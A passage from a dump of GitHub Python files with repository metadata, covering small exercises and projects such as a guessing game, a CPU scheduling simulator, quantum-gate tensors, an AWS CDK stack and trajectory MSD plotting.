**extra_kwargs\n)\n\n\n","repo_name":"anoroozian/pyvt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"415165808","text":"# Using Python to solve the questions.\n# Question 2\n\n\ndef getSeason(num):\n winter = [12, 1, 2]\n spring = [3, 4, 5]\n summer = [6, 7, 8]\n autumn = [9, 10, 11]\n if num in winter:\n return \"Winter\"\n elif num in spring:\n return \"Spring\"\n elif num in summer:\n return \"Summer\"\n elif num in autumn:\n return \"Autumn\"\n else:\n raise ValueError(\"Invalid Value.\")\n\n\nprint(getSeason(222))\n","repo_name":"ntexplorer/PythonPractice","sub_path":"CashCalc_Recruiment/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24675447355","text":"# Importamos la biblioteca \"random\" para generar números aleatorios.\nimport random\n\n# Generamos un número aleatorio entre 0 y 100 y lo almacenamos en la variable \"aletoria\".\naletoria = random.randint(0, 100)\n\n# Inicializamos una variable \"intentos\" en 0 para llevar un registro de los intentos del usuario.\nintentos = 0\n\n# Creamos un bucle que se ejecutará indefinidamente hasta que el usuario adivine el número.\nwhile True:\n # Solicitamos al usuario que ingrese el número que crea correcto.\n numero_usuario = int(input(\"\\nADIVINA EL NÚMERO (0 a 100): \"))\n\n # Comparamos el número ingresado por el usuario con el número aleatorio generado.\n if numero_usuario < aletoria:\n # Si el número ingresado por el usuario es menor, mostramos un mensaje y aumentamos el contador de intentos.\n intentos += 1\n print(f\"El número aleatorio es mayor que {numero_usuario}\\nIntento #{intentos}\")\n\n elif numero_usuario > aletoria:\n # Si el número ingresado por el usuario es mayor, mostramos un mensaje y aumentamos el contador de intentos.\n intentos += 1\n print(f\"El número aleatorio es menor que {numero_usuario}\\nIntento #{intentos}\")\n\n else:\n # Si el usuario adivina el número, mostramos un mensaje y el número de intentos.\n intentos += 1\n print(f\"LO HALLASTE \\nEl número es {numero_usuario}\\nAdivinaste en {intentos} intentos\")\n\n # Salimos del bucle usando 'break'.\n break","repo_name":"CarlangasDeveloper/Taller2_Programacion_Python","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72986518328","text":"import aws_cdk as cdk\nimport aws_cdk.aws_sqs as sqs\nimport aws_cdk.aws_lambda as lambda_\nimport aws_cdk.aws_lambda_event_sources as eventsources\nimport aws_cdk.aws_dynamodb as ddb\nfrom constructs import Construct\n\n\n# Build a Stack with SQS -> lambda -> DDB\n# events from sqs are picked up by a lambda, which saves them in a DDB table\nclass Infra(cdk.Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n # create the queue\n queue = sqs.Queue(\n self, \"InfraStackQueue\",\n visibility_timeout=cdk.Duration.seconds(300),\n )\n\n # create the lambda function\n fn = lambda_.Function(self, \"InfraStackLambda\",\n runtime=lambda_.Runtime.PYTHON_3_8,\n handler=\"handler.lambda_handler\",\n code=lambda_.Code.from_asset(\"monorepo_cdk\")\n )\n\n # set up the queue as an event source to the lambda\n fn.add_event_source(eventsources.SqsEventSource(queue))\n\n # create the Dynamo DB table and grant r/w permission tot he lambda function\n table = ddb.Table(self, \"InfraStackDDB\",\n partition_key=ddb.Attribute(name=\"id\", type=ddb.AttributeType.STRING))\n table.grant_read_write_data(fn)\n\n # the actual table name is not known until deployment, create a token and pass it as an env var to the lambda\n fn.add_environment(\"infra_ddb_table\", table.table_name)\n","repo_name":"iapostol-69/monorepo-cdk","sub_path":"monorepo_cdk/infra.py","file_name":"infra.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4375502236","text":"# 23.3.2022\n# testing tensors\n\nimport random\nfrom cmath import exp, pi, sqrt\n\nimport torch\nfrom torch import tensor, empty, zeros\n\nqtype = torch.complex64\n\n\nclass Qtensor(torch.Tensor):\n\n def __init__(self, x):\n super().__init__(x, dtype=torch.complex64)\n\n def qmm(self, B: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param B: a tensor\n :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n result[ii, jj] = A[ii] * B[jj]\n where ii is a multi-dim index of a and jj a multi-dim index of b\n \"\"\"\n m_A, n_A = self.size()\n m_B, n_B = B.size()\n result = empty(m_A * m_B, n_A * n_B, dtype=self.dtype)\n for i in range(m_A):\n for j in range(n_A):\n result[i * m_B:(i + 1) * m_B, j * n_B:(j + 1) * n_B] = self[i, j] * B\n return Qtensor(result)\n\n def qmv(self, psi: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param psi: a vector\n :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n result[i, j] = A[i] * B[j]\n where i is a multi-dim index of a and j a multi-dim index of b\n \"\"\"\n B = psi.view(-1, 1)\n return self.mm(B)\n\n def qpow(self, n):\n if n == 0:\n return Qtensor(torch.eye(self.size()[0]))\n if n == 1:\n return self\n else:\n n, r = divmod(n, 2)\n B = self.qpow(n)\n C = B.qmm(B)\n return C if r == 0 else self.qmm(C)\n\n\ndef int2bin(i, n):\n \"\"\"\n :param i: an integer >= 0\n :param n: length of list\n :return: binary index of length max(n, log2(i))\n 6, 2 -> [1, 1, 0]\n 6, 3 -> [1, 1, 0]\n 6, 4 -> [0, 1, 1, 0]\n \"\"\"\n return [int(c) for c in bin(i)[2:].rjust(n, '0')]\n\n\ndef bin2int(ii):\n \"\"\"\n :param ii: a binary index, e.g. [0,1,0,0,1]\n :return: integer value of this number, [0,1,0,0,1] -> 9\n \"\"\"\n result = 0\n for digit in ii:\n result = (result << 1) | digit\n return result\n\n\ndef basis(ii):\n \"\"\"\n :param ii: a binary number given as list, e.g. [0,1, 1]\n :return: the corresponding base vector, size = (2**n, 1).\n Example:\n basis([0, 0, 0]) = [1, 0, 0, 0, 0, 0, 0, 0].T\n basis([0, 1, 1]) = [0, 0, 0, 1, 0, 0, 0, 0].T\n basis([1, 1, 1]) = [0, 0, 0, 0, 0, 0, 0, 1].T\n \"\"\"\n result = zeros(2 ** len(ii), dtype=qtype)\n result[bin2int(ii)] = 1\n return Qtensor(result)\n\n\ndef apply(Q, x):\n result = Q[0].mm(x)\n for q in Q[1:]:\n result = q.mm(result)\n return result\n\n\ndef U(f, n):\n \"\"\"\n :param f: a binary function of n - 1 binary variables\n :param n: the number n >= 2\n :return: the unitary (2**n x 2**n) matrix U(f)\n \"\"\"\n N = 2 ** n\n U = zeros((N, N), dtype=qtype)\n for i in range(N):\n ii = int2bin(i, n)\n head, tail = ii[:-1], ii[-1]\n j = bin2int(head + [f(head) ^ tail])\n U[i, j] = 1\n return U\n\n\ndef reorder(perm):\n \"\"\"\n :param perm: permutation of n integers 0, .., n-1\n :return: permutation of integers 0, .., 2**n - 1\n example: perm = [1, 0, 2] swaps columns 0 and 1.\n This yields [0, 1, 4, 5, 2, 3, 6, 7]\n 0: [0, 0, 0]\n 1: [0, 0, 1]\n 4: [1, 0, 0]\n 5: [1, 0, 1]\n 2: [0, 1, 0]\n 3: [0, 1, 1]\n 6: [1, 1, 0]\n 7: [1, 1, 1]\n \"\"\"\n n = len(perm)\n binaries = [int2bin(j, n) for j in range(2 ** n)]\n return [bin2int([b[i] for i in perm]) for b in binaries]\n\n\ndef tmul(A, B):\n \"\"\"\n :param A: a tensor\n :param B: a tensor\n :return: result = tensor product of A and B; size(R) = (m_A * m_B, n_A * n_B)\n result[i, j] = A[i] * B[j]\n where i is a multi-dim index of a and j a multi-dim index of b\n \"\"\"\n m_A, n_A = A.size()\n m_B, n_B = B.size()\n result = empty(m_A * m_B, n_A * n_B, dtype=A.dtype)\n for i in range(m_A):\n for j in range(n_A):\n result[i * m_B:(i + 1) * m_B, j * n_B:(j + 1) * n_B] = A[i, j] * B\n return result\n\n\ndef tpow(A, n):\n if n == 0:\n return torch.eye(A.size()[0], dtype=A.dtype)\n if n == 1:\n return A\n else:\n n, r = divmod(n, 2)\n B = tpow(A, n)\n C = tmul(B, B)\n return C if r == 0 else tmul(A, C)\n\n\ndef measure(x):\n n = x.size()[0]\n return random.choices(range(2 ** n), weights=x ** 2)\n\n\nidentity\nI = Qtensor([[1, 0],\n [0, 1]])\n\n# NOT, Pauli-X\nX = Qtensor([[0, 1],\n [1, 0]])\n\n# Pauli-Y\nY = Qtensor([[0, -1j],\n [1j, 0]])\n\n# Pauli-Z\nZ = Qtensor([[1, 0],\n [0, -1]])\n\n# Phase\nS = Qtensor([[1, 0],\n [0, 1j]])\n\n# Hadamard\nH = 1 / sqrt(2) * Qtensor([[1, 1],\n [1, -1]])\n# pi/8\nT = Qtensor([[1, 0],\n [0, exp(1j * pi / 4)]])\n\n# Controlled NOT\nCX = Qtensor([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 0, 1],\n [0, 0, 1, 0]])\n\n# controlled Z\nCZ = Qtensor([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, -1]])\n\n# SWAP\nSWAP = Qtensor([[1, 0, 0, 0],\n [0, 0, 1, 0],\n [0, 1, 0, 0],\n [0, 0, 0, 1]])\n\n# Toffoli\nTOFF = Qtensor([[1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 1, 0]])\n\n# BELL = CX.mm(tmul(H, I))\n# BELL = CX.mm(H.qmm(I))\n\nH1 = Qtensor([[1, 1],\n [1, -1.]])\n\nBELL1 = CX.mm(tmul(H1, I))\n\n\n# Deutsch-Jozsa Algorithm\n\ndef f_const(c):\n return lambda x: c\n\n\ndef f_mod2(x):\n return x[-1]\n\n\ndef f_xor(x):\n return x[0] if len(x) == 1 else x[0] ^ x[1]\n\n\ndef DEUTSCH(f, n):\n H1 = tmul(tpow(H, n - 1), I)\n return [H1, U(f, n), H1]\n\n\ndef DEUTSCH_(f, n):\n Hn = H.qp\n Hn = tpow(H, n)\n return [Hn, U(f, n), Hn]\n\n\nif __name__ == '__main__':\n pass\n print(BELL)\n\n n = 3\n y = 1 / sqrt(2) * tensor([1, -1], dtype=qtype)\n psi = basis((n - 1) * [0]).qmv(y)\n psi_ = basis((n - 1) * [0] + [1])\n\n # Hn = tpow(H, n)\n # f = f_const(1)\n # # f = f_xor\n # Uf = U(f, n)\n # print('\\n', psi_)\n # print('\\n', Hn.real)\n # print('\\n', Uf.real)\n # # print('\\n', Uf.mm(Hn))\n # # print('\\n', Hn.mm(Uf.mm(Hn)))\n # # print('\\n', Hn.mm(Uf.mm(Hn)).mm(psi_))\n\n # print(H1)\n # print()\n # print(Uf)\n # print()\n # print(Uf.mm(H1))\n #\n # fs = [f_const(0), f_const(1), f_xor, f_mod2]\n # tbl = torch.empty(2 ** n).view(-1, 1)\n #\n # for f in fs:\n # tbl = torch.cat((tbl, apply(DEUTSCH(f, n), psi).real), 1)\n #\n # df = pd.DataFrame(tbl, columns=['idx', 'f_const0', 'f_const1', 'f_xor', 'f_mod2'])\n # df['idx'] = [int2bin(i, n) for i in range(2 ** n)]\n # print(df)\n # print())\n #\n # tbl = torch.empty(2 ** n).view(-1, 1)\n # for f in fs:\n # tbl = torch.cat((tbl, apply(DEUTSCH_(f, n), psi_).real), 1)\n #\n # print('\\n', psi_)\n # df = pd.DataFrame(tbl, columns=['idx', 'f_const0', 'f_const1', 'f_xor', 'f_mod2'])\n # df['idx'] = [int2bin(i, n) for i in range(2 ** n)]\n # print(df)\n\n # Superdense Coding\n\n # def DENSE(a, b):\n # return [BELL, tmul(tpow(X, a), I), tmul(tpow(Z, b), I), BELL.T]\n #\n # for a in range(2):\n # for b in range(2):\n # y = apply(DENSE(a, b), basis([0, 0])).view(2, 2)\n # print(y[b, a])\n\n # Teleportation\n\n # TELE = [tmul(I, BELL),\n # tmul(BELL.T, I)] # BELL.T == BELL ** (-1)\n #\n # alpha = 0.1\n # psi = tensor([alpha, sqrt(1 - alpha ** 2)], dtype=qtype).view(-1, 1)\n # x = tmul(psi, basis([0, 0]))\n # y = apply(TELE, x).view(2, 2, 2)\n #\n # for a in range(2):\n # for b in range(2):\n # phi = 2 * tpow(Z, a).mm(tpow(X, b).mm(y[a, b].view(-1, 1)))\n # print(phi - psi)\n","repo_name":"johsieders/potpourri","sub_path":"fttp/src/qbits/scratch2.py","file_name":"scratch2.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46619219246","text":"'''\nSuccess\nDetails\nRuntime: 456 ms, faster than 15.73% of Python online submissions for Course Schedule.\nMemory Usage: 14.1 MB, less than 57.63% of Python online submissions for Course Schedule.\n'''\n\n\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n courses = [0] * numCourses\n for course_pair in prerequisites:\n courses[course_pair[0]] += 1\n\n num = 0\n stack = []\n for i in range(len(courses)):\n if courses[i] == 0:\n num += 1\n stack.append(i)\n\n while stack:\n i = stack.pop()\n for course_pair in prerequisites:\n if course_pair[1] == i:\n courses[course_pair[0]] -= 1\n if courses[course_pair[0]] == 0:\n num += 1\n stack.append(course_pair[0])\n\n return num == numCourses\n\n\n\n'''\nSuccess\nDetails \nRuntime: 76 ms, faster than 93.03% of Python online submissions for Course Schedule.\nMemory Usage: 14.1 MB, less than 57.63% of Python online submissions for Course Schedule.\n\n'''\n\nfrom collections import deque\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n edges = [[] for i in range(numCourses)]\n degree = [0] * numCourses\n for i, j in prerequisites:\n edges[j].append(i)\n degree[i] += 1\n\n num = 0\n queue = deque([])\n for i in range(numCourses):\n if degree[i] == 0:\n queue.append(i)\n num += 1\n # print(num)\n\n while queue:\n i = queue.popleft()\n for j in edges[i]:\n degree[j] -= 1\n if degree[j] == 0:\n queue.append(j)\n num += 1\n # print(num)\n # print(queue)\n return num == numCourses\n\n\n\n\n","repo_name":"dongbo910220/leetcode_","sub_path":"Graph/207. Course Schedule Medium.py","file_name":"207. Course Schedule Medium.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29465605729","text":"class Carro:\n def __init__(self):\n self.lista_de_productos = []\n self.descuento = 0\n self.total = 0\n self.direccion = \"\"\n\n def agregar_item(self, cantidad, producto):\n for item in self.lista_de_productos:\n if item.producto == producto:\n if cantidad == 0:\n self.lista_de_productos.remove(item)\n else:\n item.cantidad = cantidad\n return\n item = Item(cantidad, producto)\n self.lista_de_productos.append(item)\n\n def checkout(self, tipoDespacho, direccion):\n # Calcular descuentos\n for item in self.lista_de_productos:\n self.descuento += item.producto.precio * item.cantidad\n\n # Calcular valor de despacho\n if tipoDespacho == 0:\n despacho = self.descuento * 0.2\n elif tipoDespacho == 1:\n despacho = self.descuento * 0.3\n else:\n return \"Tipo de despacho inválido\"\n\n # Calcular valor total\n if \"Chile\" in direccion:\n self.total = self.descuento - despacho + self.descuento * 0.2\n else:\n self.total = self.descuento - despacho\n\n return self.total\n\n def __repr__(self):\n s = \"Carro de Compras:\\n\"\n for item in self.lista_de_productos:\n s += \"{0}: {1}\\n\".format(item.cantidad, item.producto.nombre)\n return s\n\ncarro = Carro()\ncarro.agregar_item(2, tienda.buscarProducto(1))\ncarro.agregar_item(1, tienda.buscarProducto(2))\nprint(carro.checkout(0, \"Alameda 340 Santiago Chile\"))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej1/tema8_ej1_a8d1218b2430977ecccecd26b0f093f5.py","file_name":"tema8_ej1_a8d1218b2430977ecccecd26b0f093f5.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30207865492","text":"import os\n\nimport numpy as np\n\nif not os.path.exists(\"data\"):\n os.makedirs(\"data\")\n\nNUM_PEOPLE = 10\nNUM_CLUB = 2\n\n\ndef add_edge(A: np.ndarray, i: int | list[int], j: int | list[int]):\n A[i, j] = 1\n A[j, i] = 1\n\n\nA = np.zeros((NUM_PEOPLE, NUM_PEOPLE), dtype=np.int8)\nadd_edge(\n A,\n [0, 0, 3, 3, 5, 5, 6, 6, 7, 8],\n [1, 3, 5, 6, 7, 9, 7, 9, 8, 9],\n)\nnp.save(\"data/A.npy\", A, allow_pickle=False)\n\n\nB = np.zeros((NUM_PEOPLE, NUM_CLUB), dtype=np.int8)\nB[[0, 1, 5], 0] = 1\nB[[1, 2, 3, 4], 1] = 1\nnp.save(\"data/B.npy\", B, allow_pickle=False)\n","repo_name":"TeddyHuang-00/Computational-Thinking-in-Social-Sciences","sub_path":"init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22302165270","text":"import nltk\nfrom criterias_calculation.AFINN import emotion_tab\n\nclass Emotion:\n\n def __init__(self, text):\n self.text = text\n\n def get_score(article):\n\n # version AFINN\n cpt_neg = 0\n cpt_pos = 0\n cpt_mots = 0\n val_phrases = []\n\n tokens = nltk.word_tokenize(article)\n tagged_tokens = nltk.pos_tag(tokens)\n for elem in tagged_tokens:\n if elem[0] == '.':\n val_phrases.append((cpt_neg / cpt_mots, cpt_pos / cpt_mots))\n cpt_pos = 0\n cpt_neg = 0\n else:\n cpt_mots += 1\n if elem[0] in emotion_tab:\n if emotion_tab[elem[0]] < 0:\n cpt_neg += float(emotion_tab[elem[0]])\n else:\n cpt_pos += float(emotion_tab[elem[0]])\n\n cpt_neg = 0\n cpt_pos = 0\n for values in val_phrases:\n cpt_neg += values[0]\n cpt_pos += values[1]\n\n nb_phrases = len(val_phrases)\n cpt_neg = cpt_neg / nb_phrases\n cpt_pos = cpt_pos / nb_phrases\n\n score = abs(cpt_neg) + cpt_pos\n\n return score, (abs(cpt_neg)/score*100.), (cpt_pos/score*100.)\n","repo_name":"masterdcups/fake_news_detection_tool","sub_path":"criterias_calculation/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"41514640228","text":"\"\"\"add session id to audio\n\nRevision ID: f31834b8c7a0\nRevises: 85f337478ffc\nCreate Date: 2023-03-16 16:02:53.552593\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f31834b8c7a0'\ndown_revision = '85f337478ffc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('audio_file', schema=None) as batch_op:\n batch_op.add_column(sa.Column('session_id', sa.Text(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('audio_file', schema=None) as batch_op:\n batch_op.drop_column('session_id')\n\n # ### end Alembic commands ###\n","repo_name":"adilnaut/fast-catchup","sub_path":"migrations/versions/f31834b8c7a0_add_session_id_to_audio.py","file_name":"f31834b8c7a0_add_session_id_to_audio.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36436963945","text":"from queue import Queue, PriorityQueue\r\n\r\n\r\ndef vrr(processL: list, eventq: PriorityQueue, quantum: int):\r\n clock = 0\r\n cpuIdle = True\r\n auxq = Queue()\r\n readyq = Queue()\r\n\r\n while True:\r\n if eventq.empty():\r\n return\r\n event = eventq.get()\r\n # print(event)\r\n\r\n if event[1] == 'ARRIVAL' or event[1] == 'UNBLOCK':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n\r\n if event[1] == 'ARRIVAL':\r\n readyq.put(event[2])\r\n else:\r\n auxq.put(event[2])\r\n\r\n # subtracting cur time from resp. sum\r\n processL[event[2]][1][4] -= clock\r\n\r\n elif event[1] == 'TIMEOUT':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n cpuIdle = True\r\n processL[event[2]][1][4] -= clock\r\n readyq.put(event[2])\r\n\r\n elif event[1] == 'BLOCK':\r\n if event[0] > clock:\r\n clock = event[0]\r\n stuff = processL[event[2]][0]\r\n time = int(stuff[stuff.find(\" \"):stuff.find(\" \", stuff.find(\" \") + 1)])\r\n\r\n # adding unblock event to queue\r\n eventq.put((clock + time, 'UNBLOCK', event[2]))\r\n\r\n cpuIdle = True\r\n\r\n # updating process stuff\r\n new_stuff = stuff[stuff.find(' ', 3) + 1:]\r\n processL[event[2]][0] = new_stuff\r\n\r\n elif event[1] == 'EXIT':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n cpuIdle = True\r\n # finish time\r\n processL[event[2]][1][3] = clock\r\n\r\n if cpuIdle:\r\n if auxq.empty():\r\n if readyq.empty():\r\n continue\r\n pid = readyq.get()\r\n # print('dispatch rq ' + str(pid))\r\n else:\r\n pid = auxq.get()\r\n # print('dispatch aq ' + str(pid))\r\n\r\n # setting start time\r\n if processL[pid][2]:\r\n processL[pid][1][2] = clock\r\n processL[pid][2] = False\r\n # adding current clock to resp. sum\r\n processL[pid][1][4] += clock\r\n processL[pid][1][5] += 1\r\n\r\n cpuIdle = False\r\n stuff = processL[pid][0]\r\n bursttime = int(stuff[stuff.find(\" \"):stuff.find(\" \", stuff.find(\" \") + 1)])\r\n if bursttime > quantum:\r\n time = quantum\r\n else:\r\n time = bursttime\r\n\r\n # service time update\r\n processL[pid][1][1] += time\r\n\r\n # updating process stuff\r\n if bursttime <= quantum:\r\n new_stuff = stuff[stuff.find(' ', 4) + 1:]\r\n else:\r\n new_stuff = 'CPU ' + str(bursttime - quantum) + ' ' + stuff[stuff.find(' ', 4) + 1:]\r\n processL[pid][0] = new_stuff\r\n\r\n if new_stuff == '':\r\n eventq.put((clock + time, 'EXIT', pid))\r\n\r\n else:\r\n if bursttime <= quantum:\r\n # adding block event to aux queue\r\n eventq.put(((clock + time), 'BLOCK', pid))\r\n\r\n else:\r\n # adding timeout to ready queue\r\n eventq.put((clock + quantum, 'TIMEOUT', pid))\r\n","repo_name":"KTKChAoS/OS-scheduling-algorithms","sub_path":"vrr.py","file_name":"vrr.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42563638056","text":"import torch\nfrom graph_construction import graph_construction\n\ndef metric_M_diagonal(M_normalizer,feature,\\\n b_ind,\\\n label,\\\n n_feature,\\\n M_d_in,\\\n n_train,\\\n metric_M_step,Q_mask,optimizer_M,\\\n M_rec,\\\n low_rank_yes_no):\n \n if low_rank_yes_no==0:\n tril_idx=torch.tril_indices(n_feature,n_feature)\n Cholesky_U_0=torch.zeros(n_feature,n_feature)\n Cholesky_U_0[tril_idx[0,Q_mask],tril_idx[1,Q_mask]]=M_d_in\n M0=Cholesky_U_0@Cholesky_U_0.T\n else:\n M0=M_rec@M_rec.T\n \n factor_for_diag=torch.trace(M0)/M_normalizer\n M=M0/factor_for_diag\n \n\n \n # v = Variable(M_d_in.reshape(n_feature), requires_grad=True)\n # M_0=torch.diag(v)\n feature_train=feature[b_ind,:]\n L=graph_construction(feature_train, n_train, n_feature, M)\n metric_M_obj=torch.matmul(torch.matmul(label[b_ind].reshape(1,n_train),L),\\\n label[b_ind].reshape(n_train,1))\n \n metric_M_obj.backward()\n optimizer_M.step() \n # print(metric_M_obj)\n # projection\n # M_d=F.relu(M_d_in-metric_M_step*v.grad)\n # trace(M) <= n_feature\n # while M_d.sum()>n_feature:\n # try_num=(M_d.sum()-n_feature)/M_d.count_nonzero()\n # M_d=F.relu(M_d-try_num)\n # M_d_out=M_d.reshape(n_feature)\n # M_d_out=torch.multiply(M_d,n_feature/M_d.sum()).reshape(n_feature)\n # M=torch.diag(M_d)\n if low_rank_yes_no==0:\n Cholesky_U_0[tril_idx[0,Q_mask],tril_idx[1,Q_mask]]=M_d_in\n M0=Cholesky_U_0@Cholesky_U_0.T\n else:\n M0=M_rec@M_rec.T\n \n factor_for_diag=torch.trace(M0)/M_normalizer\n M=M0/factor_for_diag \n L_M=graph_construction(feature_train, n_train, n_feature, M)\n metric_M_obj_M=torch.matmul(torch.matmul(label[b_ind].reshape(1,n_train),L_M),\\\n label[b_ind].reshape(n_train,1))\n tol_current=torch.norm(metric_M_obj_M-metric_M_obj)\n return M_d_in,M,tol_current,M_rec","repo_name":"bobchengyang/SDP_RUN","sub_path":"metric_M_diagonal.py","file_name":"metric_M_diagonal.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30414301474","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom scipy.optimize import curve_fit\nimport debugpy\n\n\ndef calculate_msd(sample_data, unique_track_ids):\n max_norm_time = sample_data[\"normTime\"].max()\n msd = np.full((len(unique_track_ids), max_norm_time), np.nan)\n\n for ii in range(len(unique_track_ids)):\n track_data = sample_data[sample_data[\"TrackID\"] == unique_track_ids[ii]]\n norm_time = track_data[\"normTime\"].values\n msd_cell = track_data[\"MSD\"].values\n if len(msd[ii, :]) > len(msd_cell):\n msd[ii, :] = np.pad(\n msd_cell,\n (0, len(msd[ii, :]) - len(msd_cell)),\n \"constant\",\n constant_values=np.nan,\n )\n\n msd = np.nanmean(msd, axis=0) / (np.pi * 25)\n return msd[~np.isnan(msd)]\n\n\ndef plot_power_law_fits(msd, time_spacing):\n def power_law_model(x, A, B):\n return A * x**B\n\n start_ind = round(len(msd) / 4)\n fit_params, _ = curve_fit(\n power_law_model, np.arange(start_ind, len(msd)) * time_spacing, msd[start_ind:]\n )\n fit_A, fit_B = fit_params\n print(f\"Fit: A={fit_A:.2f}, B={fit_B:.2f}\")\n\n xref = np.logspace(0.2, 2.5, num=100)\n plt.plot(xref, 10**-2 * xref, \"k--\", linewidth=2)\n plt.plot(xref, 10**-2 * xref**2, \"r--\", linewidth=2)\n\n\ndef plot_3d_movie(T):\n times = T[\"Time\"].unique()\n # Calculate global axis ranges from the entire dataset\n x_range_global = [min(T[\"posx\"]), max(T[\"posx\"])]\n y_range_global = [min(T[\"posy\"]), max(T[\"posy\"])]\n z_range_global = [min(T[\"posz\"]), max(T[\"posz\"])]\n\n # Calculate aspect ratios based on global axis ranges\n x_range_length = x_range_global[1] - x_range_global[0]\n y_range_length = y_range_global[1] - y_range_global[0]\n z_range_length = z_range_global[1] - z_range_global[0]\n\n aspect_ratio_x = x_range_length / z_range_length\n aspect_ratio_y = y_range_length / z_range_length\n aspect_ratio_z = 1.0\n\n # Create a figure with a 3D scatter plot\n fig = go.Figure(\n data=[\n go.Scatter3d(\n x=[], y=[], z=[], mode=\"markers\", marker=dict(color=\"red\", size=1)\n )\n ]\n )\n # Define frames for the animation\n frames = []\n for t in times:\n filtered_data = T[T[\"Time\"] == t]\n scatter = go.Scatter3d(\n x=filtered_data[\"posx\"],\n y=filtered_data[\"posy\"],\n z=filtered_data[\"posz\"],\n mode=\"markers\",\n name=f\"Time {t}\",\n )\n frame = go.Frame(data=[scatter], name=f\"frame_{t}\")\n frames.append(frame)\n\n frame_layout = {\n \"scene\": {\n \"xaxis\": {\"range\": x_range_global},\n \"yaxis\": {\"range\": y_range_global},\n \"zaxis\": {\"range\": z_range_global},\n \"aspectmode\": \"manual\", # Set the desired aspect mode\n \"aspectratio\": {\n \"x\": aspect_ratio_x,\n \"y\": aspect_ratio_y,\n \"z\": aspect_ratio_z,\n },\n }\n }\n for frame in frames:\n frame.update(layout=frame_layout)\n\n debugpy.breakpoint()\n fig.frames = frames\n\n # Define animation settings\n animation_settings = go.layout.Updatemenu(\n type=\"buttons\",\n showactive=False,\n buttons=[\n {\n \"label\": \"Play\",\n \"method\": \"animate\",\n \"args\": [\n None,\n {\"frame\": {\"duration\": 100, \"redraw\": True}, \"fromcurrent\": True},\n ],\n },\n {\n \"label\": \"Pause\",\n \"method\": \"animate\",\n \"args\": [\n [None],\n {\n \"frame\": {\"duration\": 0, \"redraw\": True},\n \"mode\": \"immediate\",\n \"transition\": {\"duration\": 0},\n },\n ],\n },\n ],\n )\n # Set initial frame\n fig.update(frames=frames)\n\n # Set layout and animation settings\n fig.update_layout(\n title=\"Position Data Animation\",\n updatemenus=[animation_settings],\n scene=dict(\n xaxis_title=\"Position X\",\n yaxis_title=\"Position Y\",\n zaxis_title=\"Position Z\",\n ),\n )\n\n # Show the plot\n fig.show()\n\n\ndef main():\n # Read the CSV file\n filename = \"/Users/AndrewTon/Downloads/MSD_wt.csv\"\n time_spacing = 3 # minutes\n T = pd.read_csv(filename)\n\n # Set plot settings\n plt.rcParams[\"figure.figsize\"] = (10, 6)\n plt.rcParams[\"font.size\"] = 